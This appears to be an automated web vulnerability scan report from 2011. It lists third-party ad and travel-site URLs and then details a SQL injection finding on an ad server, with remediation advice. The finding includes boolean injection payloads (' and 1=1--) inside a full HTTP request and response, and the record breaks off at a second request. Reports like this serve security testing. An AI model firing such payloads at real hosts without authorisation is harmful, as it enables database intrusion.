92be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2

28.71. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3

28.72. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4

28.73. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c

28.74. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff4fedf75c954072310e47bb718171cc3f6008bbb3a666ef26bc4658dabae0475615acfb8070f584d93ecd6e9fc7bedbdc1c12c3839d265f1df0cb8e31d62de3980d6fc3b5ec52a8247b8d3fcadff665f1773943fda08486923a9d1c5b14c46941ec600deca53c60e5548a7c9d4ce75bf3bfe7f64cdbe26692916675d494d0c21072c9133d4a407a24bb7c26880f0a981ff62c1d8577075faf26f1e0ade3e25b044f29f7e8d35addf752a63b80822f0e896d8f67ccf9e456e61238d3b7b4f14177ed5ac04ae72e54672a802b5d313e24752101fa43dec67703b2571c112c4918e5a6b44e0318425bb7839b04a79f146fcc93c99059bf7a5ecb80619f01fea63f29e6b344acbf093410c24a049160b3a119b5364c4ff4c768b8dd0d676e841291103df9c684b20c8251f1a1648c56f6f1476f76864a83c1da3f9f3800b689474f7642b056b057dbcb6e6da68d37d7eb05f930517bfeb2d66f747d58038d4c84c29e1cf40c0da735b5d723462fa33f6b18d80c01b3d04a1849fa67f1535d968cb5dc708a15aac4e706b9b713e15e5d285e2014f212a89767d4fe06cfb32ea85cf890d6dfbef74acb3fc367cea30e94038de3e1aa79384996ca8d054b729af1dbc2811c10c56f309fc18d1c165153941337825e63b7886fdebf070bf3c03ea3cf931cd2948b5ec79e42a1461446d88c1c2e1ff926d5e648555470eb34605189cba34d9a181e0d48ace7ef0afc9aad3417df53fb0c6c20056b7158709123e0a70dab3c9d340cd934928602a0d59a59c912e17ce64d7385ffef35bf75d7fd346c1f4c2da44855532b188f6307dbd919984cba3d3b971aa64a1c127b788d732876b4cbbd60eb28d4f6ba9603a31a456007f91b8f028dfc40e9ba794cef21882b3eb4d61e60643b4bea91c33aa91d4e580d80e69530bed07dd40569e7f92e4eee0f990ec55cacd5cf278c1ae9ab88f56354f950069a039579aaddfcec2b65a02d43a2b6bd1e098c692f758628befd10bbdc96885daa234f53e588c036f1cbba8e5b95961a90114cfaeaad2d7e46127fb4a96e22ce5a05f2741679ac444364f6ca562a3c6b5809a253b832c4fd16c3276951b57e4e7a44a4bc522fcbac78d5716cd8eaf820201a06db34ab081bdc8f1b78ca9a56e9995dcc3c648c793effe44bd6995bdbcf0206e5af8b6f683146c8ad5b8e278391efcc39aa9f482905058c1e5a01ef47377bd6efcae4c705d7fcb7c0a81067ab8dc3477eaf5b84175e25f26e8e83c3994e57e8981019e56e79f150db5afbcf7f5922bcf832d3e2daf701a0ea937d2e248995f29e8ce7bb57f97748c2b6943e36683773909253b2d797d2db27de8028d825ef24a33a9c15e306ce3eff2cd0c9c9c17a5283a42701a007474e46d8a3f14921a63bd99b324cfac806865fe2c48c3d64e9b0eb8bb307e59fd75d2a8763fadede9ca07b1de9269fa780b69b58c3447992fa4e6c86bc4c6de7228088ffd2c0d624540c42a27ef980006ee1c2

28.75. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c893c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6

28.76. http://showadsak.pubmatic.com/AdServer/AdServerServlet

28.77. http://sr2.liveperson.net/hcp/html/mTag.js

28.78. http://survey.122.2o7.net/survey/dynamic/suites/332/hotelsallprod/list.js

28.79. http://uxm.thousandeyes.com/rest/json

28.80. http://www.agoda.com/js/MainTextSearch.js

28.81. http://www.agoda.com/pages/agoda/default/page_traffic.aspx

28.82. http://www.agoda.com/pages/agoda/test/rendertime_techno.aspx

28.83. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

28.84. http://www.cheaptickets.com/cacheable/empty.html

28.85. http://www.facebook.com/extern/login_status.php

28.86. http://www.getaroom.com/browse/market_deals

28.87. http://www.hotels.com/hoteldetails/urgencypopup.html

28.88. http://www.hotels.com/selectors/en_US/

28.89. http://www.hublot.com/favicon.ico

28.90. http://www.inadcoads.com/script.ashx

28.91. http://www.manutd.com/styles/greybox/gb_scripts.js

28.92. http://www.nike.com/nikefootball/global/xml/style.xml

28.93. http://www.nike.com/nikefootball/home/socialfeeds

28.94. http://www.nike.com/nikefootball/home/twitterfeed

28.95. http://www.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

28.96. http://www.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

28.97. http://www.orbitz.com/cacheable/empty.html

28.98. http://www.revresda.com/favicon.ico

28.99. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

28.100. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script&

28.101. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script&

28.102. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.103. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.104. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.105. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.106. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.107. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.108. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.109. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.110. http://www.sabrehospitality.com/favicon.ico

28.111. http://www.sabrehospitality.com/images/masthead/int-masthead-distribution.jpg

28.112. http://www.sabretravelnetwork.com/favicon.ico

28.113. http://www.tnetnoc.com/siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png

28.114. http://www.tripadvisor.com/HotelCheckRates

28.115. http://www.tripadvisor.com/api/ratinginfo/1.0/getRating

28.116. http://www.turkishairlines.com/data/gateway.aspx

28.117. http://www.turkishairlines.com/data/promotion.aspx

28.118. http://www.turkishairlines.com/en-CA/quicksearch.aspx

28.119. http://www9.effectivemeasure.net/v4/em_js

29. Content type is not specified

29.1. http://ad.technoratimedia.com/st

29.2. http://ad.yieldmanager.com/st

29.3. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

29.4. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

29.5. http://pcm1.map.pulsemgr.com/uds/pc

29.6. http://www.aon.com/manchesterunited/fougrdbd-webfont.ttf

29.7. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

29.8. http://www.expedia.com/static/default/default/eta/commonIcons.gif

29.9. http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html

29.10. http://www.expedia.com/static/default/default/images/bubble_left_onblue.gif

29.11. http://www.expedia.com/static/default/default/images/bubble_right_onblue.gif

29.12. http://www.expedia.com/static/default/default/images/eta/sp_logo.gif

29.13. http://www.expedia.com/static/default/default/images/eta/stampa.gif

29.14. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

29.15. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

29.16. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

29.17. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

29.18. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif

29.19. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif

29.20. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif

29.21. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

29.22. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

29.23. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

29.24. http://www.expedia.com/static/default/default/stubs/adserver.json

29.25. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

29.26. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

29.27. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

29.28. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

29.29. https://www.expedia.com/static/default/default/eta/commonIcons.gif

29.30. https://www.expedia.com/static/default/default/images/bpg/BPG_logo_US.gif

29.31. https://www.expedia.com/static/default/default/images/creditcard.gif

29.32. https://www.expedia.com/static/default/default/images/popup_bottom_notch.gif

29.33. https://www.expedia.com/static/default/default/images/progressbar.gif

29.34. https://www.expedia.com/static/default/default/stubs/adserver.json

29.35. https://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

29.36. https://www.expedia.com/static/fusion/v2.3/images/buttonBGtransparent.png

29.37. https://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

29.38. https://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

29.39. http://www.orbitz.com/App/SubmitQuickSearch

30. SSL certificate

30.1. https://secure.mlb.com/

30.2. https://www.expedia.com/


1. SQL injection  next
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://ad.yieldmanager.com/imp [atf parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The atf parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the atf parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /imp?Z=300x250&atf=1'%20and%201%3d1--%20&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=4187966827&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response 1

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:37 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0134.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:37 GMT
Pragma: no-cache
Content-Length: 1800
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<script type=\'text/javascript\' src=\'http://ad.turn.com/server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=27255150&ahcid=2583630&bimpd=lw-vFKdVdt5jymyFqiJARROI2dRcPU5t9ZR1nw7zLfGyYRMnE5CBXotWai1zkkh5aQyuKezoNUrOWJ5OOejNY_hJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14DGxlqQmkrMO95frYlC-2EecdQoEWgIftwRBNTCUIHlnIX2X-btI9IF1hQqZV-fS_9r7SRIRbOFhwT4uGv7bxlxoogu7v0QCZlqoLiKSE0YoB1I82nS-1Az844z0LvrxUVFSFAqZZv9Y6DfnxcXgN-CLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXuw9rtxn9I-6VbCSFXDmUXUF3DL4c-PvPhKwaZQZOxh4y_pKLDOLgieGxoRV6uf0r3GnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnGRpqH141eggasYFFNO0SQRhrB2q8vsB_pWw7eofVu65DMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhSIgs650GHZdIqJT1wU-IA6y0RdukcSHg45VLcxfHZDyvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPijkriCu4UjPOsP76C358RxZLtOEV4-KNgW6xYUbQ9gzQ8BL-KZxXJBiWKRPNmIYZxasgEkMt3v87EW0sfEZwqdLK1EaGuwAlEPUKyOoDOQbdT_c9SK2zNgw7l2BpfGmhKXO_wudIg0fd7Kg-WDT38ZQTxw0DEqZsZHYOIht_MLky730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0150&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVT8tugzAQ%2EBpuyMJ2eAn14MQhosJJaVHSckEGGxHxrEMFytfXamjvXa20o9mdWQ3EAa6k9IXAG15C7rpVADEqXUtyiCvTCoIAIs%2EHeIMc8xZtBTkNy2GmXh8l5KeoA38hIdQjSfTgXzwCZgqAnb3HD4YUOzavIjd5W%2DG6%2D9%2DgfvW6XyX632qFPslpuUfbP6%2EDc5tdmM1Q2MaXc3NM9xNLw5btLPsjTaw4LTdZKhqWnjvWHZtsjaT1T6ZZT9NoYGKgULcAk%2DJCLmAYZb%2DAcug0ySsFxlofhfehl1dhYOpgHxrIKQuNr%2E1NqilXvBdDl%2EdfXSFVXkslvwHt2G1w%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere\'></script>');
var rm_data = new Object();
rm_data.creative_id = 8690940;
rm_data.offer_type = 3;
rm_data.entity_id = 424978;
if (window.rm_crex_data) {rm_crex_data.push(8690940);}

Request 2

